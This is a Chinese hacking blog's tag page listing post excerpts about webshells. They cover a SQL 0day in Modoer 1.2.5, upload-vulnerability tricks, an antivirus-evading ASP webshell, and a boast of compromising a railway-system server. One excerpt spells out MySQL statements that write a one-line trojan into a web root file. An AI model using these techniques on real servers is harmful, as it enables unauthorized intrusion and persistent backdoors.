浏览模式: 标准 | 列表Tag:webshell

TNTHK小组内部版webshell后门解析

TNTHK小组内部版,是网上黑友们用得比较多的webshell,但黑防说得好,世上没有绝对的安全,只有绝对的不安全...

» 阅读全文

Tags: tnthk, webshell

Modoer 1.2.5 SQL 0day

继续黑客笔记的整理发布......

此讲Modoer 1.2.5 SQL 0day ......

» 阅读全文

Tags: sql, oday, webshell, 入侵

手工添加验证码

现在,在网络上利用营销软件发垃圾垃圾广告的越来越多了,如何让网站杜绝垃圾门,网上众说纷纭!不过,添加验证码不失为一简单可行之策(当然这只能防止一些机器人,对于那种人工的就没办法了)......

» 阅读全文

Tags: webshell, 黑客

MySQL一句话导出Shell

以前经常看黑手、X或者安全的童鞋应该都知道,利用SQL导出一句话,具体命令大致如下:

SQL代码
  1. Drop TABLE IF EXISTS temp; //如果存在temp表就删掉         
  2. Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段         
  3. Insert INTO temp (cmd) VALUES(''); //把一句话木马插入到temp表         
  4. Select cmd from temp into out file 'D:/wwwroot/eval.php'; //查询temp表中的一句话并把结果导入eval.php       
  5. Drop TABLE IF EXISTS temp; //删除temp   

» 阅读全文

Tags: webshell, mysql

上传漏洞的再次发掘

前一阵子,无意中进了一个叫做黑客笔记的blog,浏览了几篇里面的文章,深有启发!现稍作整理,一一共享出来......

此篇是有关上传方面的,觉得思路挺好的!有兴趣的就和我一起看看吧......

» 阅读全文

Tags: 上传, webshell, 黑客, 入侵

源码藏猫腻?

前几天从网上下了个源码本地测试,即将大功告成欲FTP之际,陡然通过DW发现源码文件里面藏有猫腻,欲知详情,且听我慢慢道来......

» 阅读全文

Tags: 入侵, webshell, 黑客, 网站

拿下铁路系统服务器

本应朋友之约检测另一网站的,不想看到电子版铁路物资目录维护系统,技痒难耐,遂hacking......

最终如愿拿下服务器,过程就不便描述了,仅截图几张又作明证!

» 阅读全文

Tags: 黑客, webshell, 入侵

一款ASP精巧小马

提供一款ASP精巧小马,目前过任何杀软,是hacking之必备工具,现将代码公之与众...

» 阅读全文

Tags: 黑客, webshell